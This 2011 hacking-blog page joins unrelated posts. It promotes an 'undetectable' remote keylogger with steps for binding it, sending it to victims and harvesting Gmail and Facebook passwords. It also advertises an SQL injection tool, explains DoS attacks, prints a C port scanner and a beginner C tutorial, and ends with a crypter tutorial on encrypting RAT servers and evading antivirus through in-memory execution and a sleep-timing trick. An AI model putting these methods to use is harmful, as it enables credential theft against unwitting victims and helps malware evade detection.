Tuesday, 5 July 2011

UD Remote Keylogger To Hack Gmail, Facebook Account Password (v2.0)

FUD keylogger is the one we all want. But when ever I give any Keylogger it got arrested by most of the Anti-spywares and Anti-virus. Previously I posted one UD keylogger and again its got detected in 4 days only. So again I am going to share the same keylogger's updated FUD keylogger

Hack Facebook Accounts , Hack Gmail Account With FUD Keylogger

Here I am going to present a New Remote Keylogger which has the power to hack facebook accounts and Hack Gmail Accounts to record all the key strokes typed

Features Of New UD Remote Keylogger :

  • UD - 1/33
  • You Can Use Gmail Account to get the logs
  • Add To Start Up also included
  • It also Kills Task Manager
  • Automatically Hides the virus after infecting the victim
  • Also Disables Registry Editing
  • Stops victim From Ending Your Keylogger's Process
  • New Icon Changer
  • File Binder
  • With Fake Error Message
  • Includes Time Interval

How To Use This Remote Keylogger for Hacking Of Facebook Accounts

- Download The Remote UD Keylogger and extract the folder to desktop
- Open the Remote keylogger and enter new created Gmail account username and password
- Select the other settings as you need and donot forget to change Time Interval to 2 min
- If you want then use Icon changer, File Binder, etc and then click on Build Server
- Now upload this keylogger to file sharing sites like megaupload.com , mediafire.com
- Now send Server to victim by any mean and when he/she will click on server, he will be hacked
- Now you will get the victim typed keystroke which also includes Hack Facebook Account Password
- You can hack any account by this Remote Keylogger

So you are done, I am sure that you will enjoy this Remote Keylogger and if you have any problem then please do comment and share your problem. I am always ready to help you all.

Incoming search terms:-
  • Hack Gmail Account
  • Hacking of facebook account
  • Hack gmail account
  • Hack Gmail account password
  • Hack facebook account online

SQL injection Hack tool for hacking websites and database

Safe3SI is one of the most powerful and easy usage penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a kick-ass detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.


how to hack websites using SQL injection, SQL Hack tool


Features

  • Full support for http, https website.
  • Full support for Basic, Digest, NTLM http authentications.
  • Full support for GET, Post, Cookie sql injection.
  • Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, SQLite, Firebird, Sybase and SAP MaxDB database management systems.
  • Full support for four SQL injection techniques: blind, error-based, UNION query and force guess.
  • Powerful AI engine to automatic recognize injection type, database type, sql injection best way.
  • Support to enumerate databases, tables, columns and data.
  • Support to read,list and write any file from the database server underlying file system when the database software is MySQL or Microsoft SQL Server.
  • Support to execute arbitrary commands and retrieve their standard output on the database server underlying operating system when the database software is Oracle or Microsoft SQL Server.
  • Support to ip domain query,web path guess,md5 crack etc.
  • Support for sql injection scan.


Download

Denial Of Service Attack

Its Real,On February 6th, 2000, Yahoo portal was shut down for 3 hours. Then retailer Buy.com Inc. (BUYX) was hit the next day, hours after going public. By that evening, eBay (EBAY), Amazon.com (AMZN), and CNN (TWX) had gone dark. And in the morning, the mayhem continued with online broker E*Trade (EGRP) and others having traffic to their sites virtually choked off.
What is a Denial Of Service Attack?
 

  • A denial of service attack (DOS) is an attack through which a person can render a system unusable or significantly slow down the system for legitimate users by overloading the resources, so that no one can access it.
  • If an attacker is unable to gain access to a machine, the attacker most probably will just crash the machine to accomplish a denial of service attack.
Types of denial of service attacks
There are several general categories of DoS attacks.Popularly, the attacks are divided into three classes:
  • bandwidth attacks,
  • protocol attacks, and
  • logic attacks
     
What is Distributed Denial of Service Attack?
  • An attacker launches the attack using several machines. In this case, an attacker breaks into several machines, or coordinates with several zombies to launch an attack against a target or network at the same time.
  • This makes it difficult to detect because attacks originate from several IP addresses.
  • If a single IP address is attacking a company, it can block that address at its firewall. If it is 30000 this is extremely difficult.

Port Scanner in C (with Translation of Functions)

.........................................................................................................

#include                                             //standard library function
#include                                      //for socket n networking functions
#include                                     //for socket function
#include                                      //for networking
#include                                          //for database......... not required........ here
#include                                            //stad library function hope u guys know abt this
#include

/* Main programs starts*/
int main(int argc, char **argv)                                   //argc
{
   int   sd;         //socket descriptor
   int    port;         //port number
   int   start;         //start port
   int    end;         //end port
   int    rval;         //socket descriptor for connect
   char    response[1024];      //to receive data
   char   *message="shell";       //data to send
   struct hostent *hostaddr;   //To be used for IPaddress
   struct sockaddr_in servaddr;   //socket structure

   if (argc < 4 )
   {
      printf("------Created By www.Softhardware.co.uk-----------\n");
      printf("--------------------------------------------------\n");
      printf("Usage: ./tscan \n");
      printf("--------------------------------------------------\n");
      return (EINVAL);
   }
   start = atoi(argv[2]);                                                           //Takes the starting port number to scan from
   end   = atoi(argv[3]);                                                          // FOr last port number that has to be scanned

   for (port=start; port<=end; port++)
   {

         //portno is ascii to int second argument

   sd = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP); //created the tcp socket // PF_INET==family name AF_INET can also be used, SOCK_STREAM is how data bytes have to be sent, IPPRPTP_TCP== which protocol to follow, UDP or TCP

   if (sd == -1) // THis fucntion checks for the socket creation, if socket is created successful then continue else....                         print error
   {
     perror("Socket()\n");
     return (errno);
   }

   memset( &servaddr, 0, sizeof(servaddr));

   servaddr.sin_family = AF_INET;  //FAMILY NAME
   servaddr.sin_port = htons(port); //set the portno

   hostaddr = gethostbyname( argv[1] ); //get the ip 1st argument

   memcpy(&servaddr.sin_addr, hostaddr->h_addr, hostaddr->h_length);

   //below connects to the specified ip in hostaddr

   rval = connect(sd, (struct sockaddr *) &servaddr, sizeof(servaddr));
   if (rval == -1)
   {
   printf("Port %d is closed\n", port);
   close(sd);
   }
   else
   printf("Port %d is open\n",port);

   close(sd);         //socket descriptor
   }

}

[for unix platform]

C Tutorial Chapter 2


Hello friends i hope you read my previous tut on basics of C, if you haven’t than please first read it Smiley

In this tut we will learn about :

  • Instructions in C
  • Assignment Operators
  • Type Conversion
  • Operator Precedence in C
  • Data Types in Detail

So lets start Wink

In our previous C tut we had seen different types of constants, variables and keywords. Before discussing anything else let me first tell you about primary datatypes in C.
The Primary Datatypes in C are :
A.   int : it represents whole numbers within the range -32768 to +32767
B.   float : it represents real numbers within the range -3.4e38 to +3.4e38
C.   char : it represents all valid ASCII characters
2.1 Instructions in C

The next logical step is to learn how constants, keywords, variables and datatypes are combined to form instructions. There are basically four types of instructions in C.
2.1.1   Type Declaration Instruction2.1.2   Arithmetic Instruction2.1.3   Input/Output Instruction2.1.4   Control Instruction

Now in this chapter we will discuss only Type Declaration Instruction and Arithmetic Instruction as it is part of every C program. We will dealt with other two types in relevant chapters Wink
2.1.1 Type Declaration Instruction

This instruction is used to declare the type of variables used in C program. Any variables used in
the program must be declared before using it in any statement. The type declaration is usually written at the beginning of the program.

Examples :

int ivar ;      /* declares a variable ivar of type int */

float ah_rocks   /* declares a variable ah_rocks of type float */

char ah      /* declares a variable ah of type char */
2.1.2 Arithmetic Instructions

Arithmetic Instructions are combination of variables operators (described next) and constants.

Here is a simple program which covers both the instructions discussed above.

Code:
/ * A program explaining arithmetic instruction and type declaration instruction */

#include
#include
void main()
{
clrscr();
int x;   /* Variable Declaration */
float y; /* Variable Declaration */

x=20;  /*  Assigning a constant value of 20 to variable x using assignment operator ‘=’ */

y = x+3.14; /* Combination of variables, operators (=,+) and constants */

printf(“The Value obtained is : “);
printf(“%f”, y); /* Read Note */
 
getch();
} /* Program end */

Output is :

Quote
The Value obtained is : 23.14

Note :

%f :  is called as format specifier and it is used with pritnf() to display float values
%d : is used with printf() to display integer values
%c : is used to display character values
P.S : We will deal with format specifier in detail in coming chapters Smiley so don’t worry Wink

***************

2.2 Operators

Operators in C are classified into

Assignment Operator
Arithmetic Operator
Relational Operator
Logical Operator
2.2.1 Assignment Operator

The assignment operator is a single equal sign(=).
This operator is used to assign values to variables.

Example :

int x; /* declares a variable x of type int */
x=30 /*assigns a constant value of 30 to x */
2.2.2 Arithmetic Operators

Arithmetic operators are used in mathematical expressions (arithmetic instructions). Just as they are used in algebra.

The following table lists the arithmetic operators:

Sr. NoOperatorDescriptionType
1+AdditionUnary Binary
2-SubtractionUnary Binary
3*MultiplicationBinary
4/DivisionBinary
5%ModulusBinary
6++IncrementUnary
7--DecrementUnary
8+=Addition AssignmentBinary
9-=Subtraction AssignmentBinary
10*=Multiplication AssignmentBinary
11/=Division Assignment   Binary
12%=Modulus AssignmentBinary

Note :

   
a.) Unary operators are the operators which perform operations on one operand.
   
b.) Binary operators are the operators which perform operation on two operands.
   
c.) Ternary operators are the operators which perform operations on three operands.


2.2.2.1 The Basic Arithmetic Operators (+,-,/,*)

The Basic Arithmetic Operators (+,-,/,*) all behave as you would expect for all
Data types.

Code:
/* Program explaining basic arithmetic operators */

#include
#include
void main()
{
clrscr();
int x,y; /* multiple variable declaration */
int addresult,subresult,divresult,mulresult; /* multiple variable declaration */
x=100; /* assignment */
y=25; /* assignment */
addresult = x + y;
subresult = x-y;
mulresult = x* y;
divresult = x/y;

printf(“Addition Result : %d \n”,addresult); / * see we use %d to print integer so it means here where we wrote %d we want a integer and to tell compiler which result we want at the place of %d we write the int we already declared here in this case addresult */
printf(“Subtraction Result %d \n”,subresult);
printf(“Multiplication Result %d \n”,muresult);
pritnf(“Division Result %d \n”,divresult);
getch();
}

Output :

Quote
Addition Result : 125
Subtraction Result : 75
Multiplication Result : 2500
Division Result : 4

Note : ‘\n’ is called an escape sequence and it is generally used to add a line after displaying.
2.2.2.1 The Modulus Operator (%)

The operator returns remainder of the division operation.
It can only be applied to integer data type.

Code:
/* program showing the use of modulus operator */

#include
#include
void main()
{
clrscr();
int x,y,mod_result;
x=42;
y=10;
mod_result=x%y;
printf(“The result of modulus operation is %d”, mod_result);
getch();
}

Output :

Quote
The result of modulus operation is 2

2.2.2.3 Arithmetic Assignment Operators (+=, -=, /=, %=)

C provides special operators that can be used to combine an arithmetic operation with an assignment operator. Consider a statement x=x+4, now the same statement can be written as x+=4. Both of them adds 4 to the variable x.

Example :

A-=1           /* same as a=a-1 */
y*=4           /* same as y=y*4 */
z%=10   /* same as z=z%10 */

Code:
/* program explaining arithmetic assignment operators */

#include
#include
void main()
{
clrscr();
int a,s,m,d,mod;
a=10;
s=20;
m=30;
d=40;
mod=55;
a+=10;
s-=5;
m*=3;
d/=10;
mod%=10;
printf(“Value of a=a+10 is %d \n”,a);
printf(“Value of s=s-5 is %d \n”,s);
printf(“Value of m=m*3 is %d \n”,m);
printf(“Value of d=d/10 is %d \n”,d);
printf(“Value of mod=mod%10 is %d \n”,mod);
getch();
}

Output :

Quote
Value of a=a+10 is 20
Value of s=s-5 is 15
Value of m=m*3 is 90
Value of d=d/10 is 4
Value of mod=mod%10 is 5

Note : The Arithmetic assignment operators not only save you a bit of typing but also it is implemented more efficiently.
2.2.2.4 Increment and Decrement Operators

The ++ amd – are the increment and decrement operators of C. The increment operator increases its operand by
one and only one and the decrement operator decreases its operand by one and only one.

In the prefix form, the operand is incremented (or decremented) before the value is obtained for the use in the expression. In the postfix form, the previous value is obtained for the use in the expression and the operand is modified.

Example :

x=43;
y=++x;

In this case y is set to 43, because the increment occurs
before x is assigned to y.
Thus y=++x is equivalent to
x=x+1
y=x;

However, when written like this,
x=42;
y=x++;

The value of x is obtained before the increment operator is executed, so the value of y is
42.
In this case y=x++ is equivalent to

y=x;
x=x+1

Code:
/* program demonstrating the increment operator */

#include
#include
void main()
{
clrscr();
int a=1;
printf(“a=%d \n”,a);
printf(“a=%d \n”,a++);
printf(“a=%d \n”,++a);
printf(“a=%d \n”,++a);
printf(“a=%d \n”,a++);
printf(“a=%d \n”,a);
getch();
}

Output :

Quote
a=1
a=1
a=3
a=4
a=4
a=5

Note : The decrement operator works in the same manner.

***************


This is not the full chapter 2 i am lil busy will post the rest part in 1-2 days Smiley

please give your suggestions and try to correct me if i am somewhere wrong Smiley

Thanks 

Tutorials [C,C++ coding]

Tutorials about C++
http://cplus.about.com/

C++ Annotations (moving from C to C++)
http://www.icce.rug.nl/documents/cplusplus/

DevCentral tutorials for C and C++
http://devcentral.iftech.com/learning/tutorials/

C++ tutorials for Windows 32, how to do without MFC, getting the compiler
to do the hard work of avoiding memory leaks, games, frequency analysis etc
http://www.relisoft.com/

... interactive guide to C++ ... written with Pascal users in mind
http://tqd.advanced.org/3074/

Coronado enterprises tutorials (formerly Gordon Dodrill's)
You can see sample chapters, but are charged for the full tutorials
http://www.coronadoenterprises.com/

Guru of the week - ie discussion papers on using C++
http://www.cntc.com/resources/gotw.html

Tutorials etc on Borland's CBuilder
http://www.richplum.co.uk/cbuilder/

Tutorial on the STL by Phil Ottewell.
http://www.yrl.co.uk/~phil/stl/stl.htmlx
http://www.pottsoft.com/home/stl/stl.htmlx
He has also got a tutorial on C for Fortran users
http://www.pottsoft.com/home/c_course/course.html

Notes for a university lecture course, but
maybe there is enough here for independent study.
http://m2tech.net/cppclass/

Note on pointers - perhaps more oriented towards C than C++.
http://www.cudenver.edu/~tgibson/tutorial/

Very simple C under DOS or MS-windows. Not much C++;
possibly useful to someone interested in programming
MS-windows without MFC etc.
http://www.cpp-programming.com

Weekly newsletter on C++ and other things: aimed at helping new
and intermediate programmers improve their coding skills.
http://www.cyberelectric.net.au/~collins

http://www.informit.com - a site run by Macmillan USA containing a lot
of information including the several well-known C++ books for
free download - if you are prepared to supply name and email address
http://www.informit.com/

C++ in 21 days - 2nd edition
http://newdata.box.sk/bx/c/

A variety of C++ books on line (Macmillian, Sams, Wiley, IDG etc)
You can see the tables of contents, but you will have to have a
subscription to read the books themselves after a free trial.
http://www.itknowledge.com/reference/dir...es.c1.html

Elementary introduction to C++ (mostly the C subset)
http://clio.mit.csu.edu.au/TTT/

How to use function-pointers in C and C++, callbacks, functors
http://www.function-pointer.org
http://www.newty.de/fpt/fpt.html

Short C++ tutorial, aimed at people who already have
experience with an object-oriented programming language
http://www.entish.org/realquickcpp/

Articles about Win32, C++, MFC articles using VC++ compiler.
http://www.codersource.net

Hope you enjoy

How to make your own 100% FUD crypter with C++

Thanks To  

This tutorial is strictly for educational purposes only, I am not responsible for any of the action you may take upon others. Please, Don't abuse this tutorial, Use it wisely.
I'm not going to explain a completely new method of how executables can be made FUD. I guess most of the public available crypters do it similarly. But the problem with those crypters is that they get detected very soon after they were published. So I figured out a way to write my own crypter in C++. In this tutorial I'm going to explain how you can implement your own crypter and how you can play around with the code to get your exe FUD again if it gets detected some day.

Maybe these ideas are not new to you and someone else posted them already here somewhere. In this case please let me know.


I tested it with two RATs:

- Poison Ivy server (v2.3.2)
- Cybergate server (v1.07.5) (Hint: "Compress with UPX" must be disabled)
(other tools might also work with this technique, just test with your exe)

The system is a Windows XP SP3 machine.
I don't know if this also works for Vista and 7. Maybe someone can try?

Server size:

- Poison Ivy: 10KB (before), 46KB (after)
- Cybergate: 290KB (before), 327KB (after)

Antivirus (AV) detection:


Screenshot 
[Image: o3ju6s4dnzrfcyul0m.png]

!!Important!! If you want to test your crypted exe with online AVs, do it only here (http://scanner2.novirusthanks.org/) and don't forget to check the checkbox "Do not distribute the sample"! Otherwise your exe will be distributed to the AV companies so they can exermine it and update their virus databases.

So let's get started!


Agenda:

1. Stuff you need
2. Implement the Encrypter
3. Implement the Stub (Decrypter)
4. Bind your encrypted exe with the Stub
5. Play around with code to get your exe to be FUD again

1. Stuff you need

- Microsoft Visual C++ Express 2010: http://www.microsoft.com/express/Downloads (the Express edition it is free)
- Resource Hacker: http://www.angusj.com/resourcehacker
- my implementations of the Encrypter and the Stub (Visual Studio projects): http://www.mediafire.com/?uvst74qimxjvoi1

2. Implement the Encrypter

Open the Visual Studio project "MyEncrypter" by double clicking on "MyEncrypter.sln" (see "1. Stuff you need" for a download link). It should look like this (sorry, I have the german version of Visual Studio):

Screenshot 
[Image: thd1654atudx28x1luu.png]

(for all of you C++ pros out there: I know my code can be optimized. I'm not used to C++ coding, so please be lenient... this is for educational purpose, not for max performance)

The Encrypter is a console application. You need it to encrypt your exe, so AVs are not able to find pattern matches. The encryption algorithm I used is the AES algorithm.

These are the steps the Encrypter takes:
1. open a given binary file
2. encrypt the data with an AES key (you may change this key as you like)
3. write the encrypted data to an output file
(try to understand what the C++ code does!)

Compile the Visual Studio project by pressing F7. Now you have got your Encrypter application "MyEncrypter.exe" in the project output directory.


[Image: yppwmgjsm4y76bn9w0u.png]

The binary file to encrypt is passed to the Encrypter as the first parameter (e.g. "MyEncrypter.exe server_to_encrypt.exe"). Either you do this by typing the command at the Win command prompt or you can also drag "server_to_encrypt.exe" onto "MyEncrypter.exe".

If the Encrypter runs successfully a file called "encrypted.dat" will be generated in the same directory as the Encrypter. This encrypted file should have exact the same size as the unencrypted file.


[Image: kbu0gmeyhefpytvedw1s.png]

This was the easy part of the tut ;) Now let's move on to the Stub.


3. Implement the Stub (Decrypter)

A Stub is the part of an exe, that is responsible for decrypting the rest of the exe on runtime and to run the decrypted code in memory. This way AVs which do only support a static code analysis (most of the AVs) do not have the chance to detect your exe. Only AVs which support dynamic code analysis are still able to detect it. But the dynamic analysis is very resource intensive so AVs running on normal end user computers don't support it.

Open the Visual Studio project "MyStub" by double clicking on "MyStub.sln" (see "1. Stuff you need" for a download link). It should look like this:


Screenshot 
[Image: 3llkv7ffrz5cbh1upxo.png]

The Stub is a Win32 application. It decrypts the binary data found in the resource of the exe. At the time of decryption, all parts of the exe is loaded into memory and is therefore invisible for the AVs. As we used the AES for encryption we need the same algorithm and the same AES key again for decryption. These are the steps the Stub takes:
1. search for the resource with the type "BIN" and the name "132" (you may change this as you like but remember what you put in here. We need it later again! Also don't use the name "0")
2. copy the encrypted resource data to the heap
3. decrypt data
4. run decrypted code (your exe) inside memory
(try to understand what the C++ code does!)

With these steps I was able to trick 15 from 16 AVs. Only the AV "VBA32" managed to get through the AES decryption. But the VBA32 also does only support a static code analysis (at least the online scanner provided with novirusthanks.org) so I came up with the idea to include the system time to get the correct AES key. If the system time is ignored (which is the case in static analysis), a wrong key is used to decrypt the data and VBA32 doesn't find anything. This step comes right before step 3 (AES decryption).


This is the main idea:

1. take system time
2. sleep for 2 seconds
3. take system time again
4. compare system times. If more then one second has passed, then take the correct key value, otherwise take a wrong key value.

When VBA32 traces the code, it ignores the sleep statement and therefore takes the wrong key value. So now all 16 AVs are tricked.


Compile the Visual Studio project by pressing F7 (make sure that the Release profile is active).


[Image: 63fd5tf8flgvs8w9xkhu.png]

Now you have got your Stub application "MyStub.exe" in the project output directory.

[Image: kt0riu1xavki4q8ef9uq.png]

Okay, now we have our Stub compiled but no resource (encrypted data) attached to it. Unfortunatelly the Express version of Visual Studio does not allow us to add resources to our project. So we have to find another way to accomplish this. The tool Resource Hacker (see "1. Stuff you need" for a download link) will help us out of this misery.


4. Bind your encrypted exe with the Stub

Start the tool Resource Hacker and open "MyStub.exe" you just compiled in step 3. It should look like this:

Screenshot 
[Image: x1pt4ccb75bild2ykvnh.png]

Now navigate to "Action" -> "Add new Resource" and open your encrypted file "encrypted.dat" from step 2. As Resource Type fill in "BIN" and as Resource Name fill in "132". Important: these identifiers must match exactly what you coded into your MyStub.exe (MyStub.cpp) from step 3. If you have changed them you have to insert the correct values here too.

Screenshot 
[Image: thvcelggsf76oamued2w.png]

Click on "Add Resource". Now your resource tree should look like this:

Screenshot 
[Image: cidnyqklr7jlvzk71n73.png]

Save your Stub with "File" -> "Save as" as a new application, e.g. "fud_server.exe" (the exe size should be the size of MyStub.exe + the size of encrypted.dat). Now your Stub is complete.
As a result you now have a crypted and working exe which is FUD (at the time of writing this tut).

Remeber: the stub exe will sleep 2 seconds at the beginning in order to get the correct decryption key.


5. Play around with code to get your exe to be FUD again

The more people trying to get their exe FUD with the ideas of this tutorial, the more likely the AVs have already developed a new recognition pattern to detect this kind of crypter. I gave you the source code, so you have the power and possibility to modify the code. I would say there are at least 4 places you can edit, modify, replace code. As menshioned above many AVs do only support static code analysis and that means when you manage to reorganise your Stub in some ways, it is FUD again because the pattern recognition of the AVs won't work anymore. So here come some ideas:

1. Change the encryption algorithm. There are many other algorithms out there like Blowfish, RC6, T-DES, ... you just need to search for C++ implementations at google.

2. Modify the sleep statement trick (see step 3). I guess this is an easy finding for AVs so be creative and find other tricks that can distinguish between real execution and code analysis.
3. Change the way, how the resource (encrypted data) is handled. Maybe there are other ways to embed a resource inside an exe.
4. Change the way, how the decrypted code is executed in memory. I think the way I have implemented right now is also an easy finding for AVs.